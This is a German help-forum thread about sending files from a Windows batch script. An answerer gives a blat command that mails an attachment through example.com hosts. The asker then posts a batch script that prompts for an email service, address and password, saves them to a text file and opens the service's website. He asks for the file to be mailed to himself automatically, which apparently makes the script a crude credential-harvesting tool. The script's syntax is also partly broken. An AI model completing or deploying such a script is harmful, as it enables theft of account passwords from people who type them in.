Dateien mit Batch verschicken?

2 Antworten

Vom Fragesteller als hilfreich ausgezeichnet

Ja:

https://stackoverflow.com/questions/709635/sending-mail-from-batch-file

Zu Skype kann ich dir nichts sagen. Das habe ich ewig nicht genutzt.

Jeronimo666666
Fragesteller

Ich kapiere das net. Gibt es eine möglichkeit das mit blat zu machen aber so ,dass es automatisch ist also ich öffne die Batch Datei und er sendet es mit Blat. Wenn es geht könntest du mir vielleicht den Link Kommentieren oder es gleich als Kommi posten wäre dir sehr dankbar!

tavkomann  14.09.2017, 19:20
@Jeronimo666666

Gibt es eine möglichkeit das mit blat zu machen aber so ,dass es automatisch ist also ich öffne die Batch Datei und er sendet es mit Blat.

Müsste so klappen:

blat -to user@example.com -server smtp.example.com -f batch_script@example.com -subject "subject" -body "body" -attach c:\mydir\myfile.txt

@echo off
@title Email-Device
if exist "%C:%\Important" (
goto A
)
if not exist "%C%\Important" (
goto B
)
goto A

:A
cls
echo Enter Email-Service:
set /p s=
cls
echo Enter Emailadress:
set /p e=
cls
echo Enter Password:
Set /p p=
cls

echo Service : %s%>>C:\Important\Important.txt
echo Email : %e%>>C:\Important\Important.txt
echo Password : %p%>>C:\Important\Important.txt
echo ---------------------------------------------------->>C:\Important\Important.txt
goto C

:B
cls
mkdir "%C:%\Important
goto A

:C
start https://%s%.com

Die erstellte txt datei will ich automatisch an meine email schicken lassen